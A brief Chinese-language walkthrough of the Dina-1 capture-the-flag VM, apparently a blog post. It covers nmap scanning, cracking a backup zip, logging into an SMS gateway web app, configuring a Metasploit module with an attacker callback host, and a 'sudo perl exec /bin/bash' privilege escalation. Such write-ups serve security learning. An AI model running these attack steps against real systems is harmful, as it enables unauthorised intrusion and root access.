Dina-1

主机发现

1
sudo arp-scan -l

1
nmap -T4 -A -p- 192.168.163.133

只有80端口，访问网站，目录扫描，扫描到robots.txt secure目录

/nothing 发现密码 my secret pass freedom password helloworld! diana iloveroot

下载 http://192.168.163.133/secure/backup.zip

使用密码 freedom 成功解压

访问 /SecreTSMSgatwayLogin 登陆用户名：touhid 密码：diana

浏览网站发现send from file页面可以上传文件，上传木马显示成功，但未找到

1
2
# 扫描网站框架
whatweb -v http://192.168.163.133/SecreTSMSgatwayLogin/

msf搜索相关漏洞，选择0

1
2
3
4
5
6
options
set rhosts 192.168.163.133
set lhost 192.168.163.132
set username touhid
set password diana
set TARGETURI http://192.168.163.133/SecreTSMSgatwayLogin/

1
sudo perl -e 'exec "/bin/bash";'

• Previous
  DC-2
• Next
  DC-3